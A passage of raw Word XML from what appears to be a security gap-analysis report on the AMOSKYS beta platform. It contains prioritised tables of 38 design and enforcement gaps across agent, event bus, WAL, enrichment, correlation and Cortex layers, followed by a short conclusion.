      <w:tr w:rsidR="00501EAB" w14:paraId="2C27463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4F1BF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CTX-02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AF8BE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Cortex</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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54805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No rate limiting destructive ops</w:t>
            </w:r>
          </w:p>
        </w:tc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8CE18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Evidence destruction</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="72D30B4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E4BA1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CTX-03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8458B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Cortex</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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0A81B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Agent credentials hardcoded</w:t>
            </w:r>
          </w:p>
        </w:tc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E0001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Exposed in git</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="25650980" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00501EAB">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="302A3178" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="200" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>10.2 P1 — High (Fix Before GA)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:tblBorders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  <w:insideH w:val="single" w:sz="6" w:space="1" w:color="CCCCCC"/>
          <w:insideV w:val="single" w:sz="6" w:space="1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9"/>
        <w:gridCol w:w="2058"/>
        <w:gridCol w:w="3566"/>
        <w:gridCol w:w="2377"/>
      </w:tblGrid>
      <w:tr w:rsidR="00501EAB" w14:paraId="78DA395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1B2A4A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88463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ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="1B2A4A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BA1DC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Layer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2100" w:type="dxa"/>
            <w:shd w:val="clear" w:color="1B2A4A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D2ADE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Gap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="1B2A4A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27E75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Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="6EBD928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70C48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AG-03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F1739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Agent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AC337" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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mitre_tactics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never populated</w:t>
            </w:r>
          </w:p>
        </w:tc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00931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Tactic analysis broken</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="703ADDE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A9323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AG-04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BA6F8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Agent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1384F" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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agent_id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not populated</w:t>
            </w:r>
          </w:p>
        </w:tc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9FBB9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Multi-agent fusion blind</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="18F0CAE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06800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AG-05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28392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Agent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E3B07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Ed25519 signing only in queue</w:t>
            </w:r>
          </w:p>
        </w:tc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B3DDA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Direct publishers unsigned</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="28E72E3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40F26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AG-09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616D8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Agent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747D8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No process binding on Linux</w:t>
            </w:r>
          </w:p>
        </w:tc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BE82E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Cannot attribute DNS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="4032D30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3BC7B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EB-03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29ABF" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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EventBus</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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73F9D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No replay protection</w:t>
            </w:r>
          </w:p>
        </w:tc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06D02" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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Dedup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collision</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="2513752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74DCB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EB-04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06E29" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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EventBus</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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F200B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No per-agent rate limiting</w:t>
            </w:r>
          </w:p>
        </w:tc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D174C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Rogue agent starves</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="3179898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2625C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WAL-01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453AB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WAL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A7E58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No maximum backlog age</w:t>
            </w:r>
          </w:p>
        </w:tc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DCACB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Stale events processed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="17D3756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E4B07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WAL-02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1017E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WAL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31038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No circuit breaker</w:t>
            </w:r>
          </w:p>
        </w:tc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21F31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Retry storms</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="753DFDF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B47F5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WAL-03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4588C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WAL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5C4D4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Chain break count not exported</w:t>
            </w:r>
          </w:p>
        </w:tc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CEE48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Tampering invisible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="27DDA21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50DAD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EN-01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A85FC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Enrichment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2C9BF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URLs not enriched</w:t>
            </w:r>
          </w:p>
        </w:tc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27CE1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Malicious URLs missed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="1A159F4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F80AD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EN-02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85B85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Enrichment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BBBBB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User context not enriched</w:t>
            </w:r>
          </w:p>
        </w:tc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DDA89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No baseline anomaly</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="6A14F1D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D052B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EN-03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C254E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Enrichment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FDD48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Binary reputation unchecked</w:t>
            </w:r>
          </w:p>
        </w:tc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8D2A0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Unknown malware passes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="168426C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E4A93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COR-02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FCD35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Correlation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041FF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Dual engines, no unified scoring</w:t>
            </w:r>
          </w:p>
        </w:tc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0A203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Inconsistent assessment</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="1542418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08A64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COR-04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9FFF5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Correlation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D4DD8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No cross-device correlation</w:t>
            </w:r>
          </w:p>
        </w:tc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02A44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Coordinated attacks missed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="7AB75A4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8B52E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COR-05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B7714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Correlation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44482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Hardcoded time windows</w:t>
            </w:r>
          </w:p>
        </w:tc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50E03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No tuning</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="4EE9954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08501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CTX-04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B5E63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Cortex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0F2CD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Hash chain NOT exposed to UI</w:t>
            </w:r>
          </w:p>
        </w:tc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F7F76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No integrity proof</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="205EB28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19717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CTX-05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E51AE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Cortex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05183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No audit trail on incident changes</w:t>
            </w:r>
          </w:p>
        </w:tc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3C524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Unattributed mods</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="043CFC2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46EBC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CTX-07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92640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Cortex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D13C7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Events API in-memory store</w:t>
            </w:r>
          </w:p>
        </w:tc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CB1C8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Lost on restart</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="32A159DA" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00501EAB">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7300CE31" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="200" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>10.3 P2 — Medium (Roadmap)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:tblBorders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  <w:insideH w:val="single" w:sz="6" w:space="1" w:color="CCCCCC"/>
          <w:insideV w:val="single" w:sz="6" w:space="1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970"/>
        <w:gridCol w:w="3414"/>
        <w:gridCol w:w="2676"/>
      </w:tblGrid>
      <w:tr w:rsidR="00501EAB" w14:paraId="42FE5C4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1B2A4A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33161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ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="1B2A4A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A0838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Layer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2100" w:type="dxa"/>
            <w:shd w:val="clear" w:color="1B2A4A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A05BD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Gap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="1B2A4A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B0E3E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Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="7ABEADB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7F8E0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AG-06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3695E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Agent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DF346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Hardcoded thresholds</w:t>
            </w:r>
          </w:p>
        </w:tc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A79C8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High false positives</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="2A8BE8E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B514D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AG-07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AA834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Agent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39355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 xml:space="preserve">No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DoH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>/DoT analysis</w:t>
            </w:r>
          </w:p>
        </w:tc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7EDD5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Encrypted tunneling missed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="2B3C0E5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3E985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AG-08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28534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Agent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D1FB1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 xml:space="preserve">Linux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systemd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stub</w:t>
            </w:r>
          </w:p>
        </w:tc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59041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Persistence gap</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="6DF40FD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EFBB1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AG-10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A9836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Agent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DFA1A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Baseline integrity unprotected</w:t>
            </w:r>
          </w:p>
        </w:tc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090E8" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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Tamperable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baselines</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="50CEEF4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072D0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EB-05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168F5" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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EventBus</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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45F35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Metrics endpoint unprotected</w:t>
            </w:r>
          </w:p>
        </w:tc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57D25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Info leakage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="7900CC7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D38ED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WAL-04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DAB4C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WAL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15C3A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Schema version not validated</w:t>
            </w:r>
          </w:p>
        </w:tc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BD9D6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Version drift</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="2591894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1F13D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WAL-05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0878D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WAL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D16A0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VACUUM locks DB</w:t>
            </w:r>
          </w:p>
        </w:tc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9A8E8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Processing stall</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="0178E4B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C16B9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EN-04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09E50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Enrichment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61424" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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MaxMind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monthly staleness</w:t>
            </w:r>
          </w:p>
        </w:tc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F81F2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Gaps between updates</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="7C777D7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B75CF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EN-05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34F8F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Enrichment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FD942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SHA256 only for hashes</w:t>
            </w:r>
          </w:p>
        </w:tc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E92EE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Older feeds unusable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="0B4CC08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42EBF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COR-03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20F02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Correlation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68D5B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All rules use 300s window</w:t>
            </w:r>
          </w:p>
        </w:tc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9966E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Long attacks missed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="12B36AD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37262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COR-06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7E3EE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Correlation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0027E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Missing Impact tactic</w:t>
            </w:r>
          </w:p>
        </w:tc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C7E3B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Destruction undetected</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="5E5D665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65F93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COR-07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D36FC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Correlation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33E4F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No delayed event recovery</w:t>
            </w:r>
          </w:p>
        </w:tc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A3197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Patient attacks missed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="52BDD16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BF471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CTX-06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D6EE9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Cortex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4D502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WebSocket over-broadcasts</w:t>
            </w:r>
          </w:p>
        </w:tc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C8B03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Privacy/isolation gap</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="07C19C8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711B1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CTX-08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E92C3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Cortex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1060C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API responses unsigned</w:t>
            </w:r>
          </w:p>
        </w:tc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1F7F1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MITM risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="299E1DC4" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00501EAB">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31E8A951" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="200" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>10.4 Gap Summary</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:tblBorders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  <w:insideH w:val="single" w:sz="6" w:space="1" w:color="CCCCCC"/>
          <w:insideV w:val="single" w:sz="6" w:space="1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3"/>
        <w:gridCol w:w="2194"/>
        <w:gridCol w:w="4973"/>
      </w:tblGrid>
      <w:tr w:rsidR="00501EAB" w14:paraId="48F786E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1B2A4A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45C58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Priority</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="1B2A4A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78698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Count</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="1B2A4A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33AE7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Layers Affected</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="1838DC1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F6E10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P0 Critical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E385A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6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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494AF" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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EventBus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(2), Correlation (1), Cortex (3)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="729BFB1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F0729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P1 High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29652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18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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DAD3F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 xml:space="preserve">Agent (4),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EventBus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(2), WAL (3), Enrichment (3), Correlation (3), Cortex (3)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="3FE5558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D6E56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P2 Medium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EBB2C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14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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F7056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 xml:space="preserve">Agent (4),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EventBus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(1), WAL (2), Enrichment (2), Correlation (3), Cortex (2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="1D5DA5F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FF8E8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TOTAL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CD1B1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38</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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56558" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>All layers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2CB54CD3" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="42510ECC" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="400" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B2A4A"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB18146" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The AMOSKYS beta v0.9.0-beta.1 represents a genuine ground-up security observability platform with innovative architecture: micro-probe agents, cryptographic hash chains, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>protobuf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-based telemetry, multi-stage enrichment, and dual correlation engines. The core data integrity mechanisms (BLAKE2b chain, Ed25519 signing capability, quarantine on corruption) are well-implemented and represent real competitive differentiation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B93A1D" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>However, 38 gaps have been identified across all layers. Of these, 6 are P0 (release-blocking), 18 are P1 (pre-GA), and 14 are P2 (roadmap). The most critical pattern is the gap between DESIGNED capability and ENFORCED behavior — signature verification exists but is optional, authorization exists but is not called, hash chains exist but are not exposed to the UI.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF742A7" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Before proceeding to advanced intelligence layers, these gaps must be systematically addressed in priority order. The foundation is architecturally sound. The enforcement is incomplete.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00501EA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01CFF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="16E24742"/>
    <w:lvl w:ilvl="0" w:tplc="2D2C7DEA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="E3DE808E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="4524CBCA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="8340C23C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="13F86656">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="89CE1010">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="B2F865C8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="0FB8542C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="99A01716">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="835734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1EAB"/>
    <w:rsid w:val="00083B05"/>
    <w:rsid w:val="002957D1"/>
    <w:rsid w:val="00501EAB"/>
    <w:rsid w:val="009A1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426795"/>
  <w15:docId w15:val="{C0FE2066-E32E-D042-B54F-A3FB6C8C9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23</Pages>
  <Words>2926</Words>
  <Characters>16681</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>139</Lines>
  <Paragraphs>39</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>19568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Akash Thanneeru</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-02-24T09:55:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-02-24T11:47:00Z</dcterms:modified>
</cp:coreProperties>
</file>